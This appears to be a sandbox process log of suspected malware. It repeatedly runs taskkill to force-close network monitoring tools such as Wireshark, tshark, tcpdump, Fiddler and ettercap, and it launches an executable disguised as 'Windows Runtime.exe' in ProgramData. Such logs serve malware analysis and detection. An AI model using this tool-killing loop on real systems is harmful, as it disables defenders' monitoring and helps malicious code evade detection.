C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
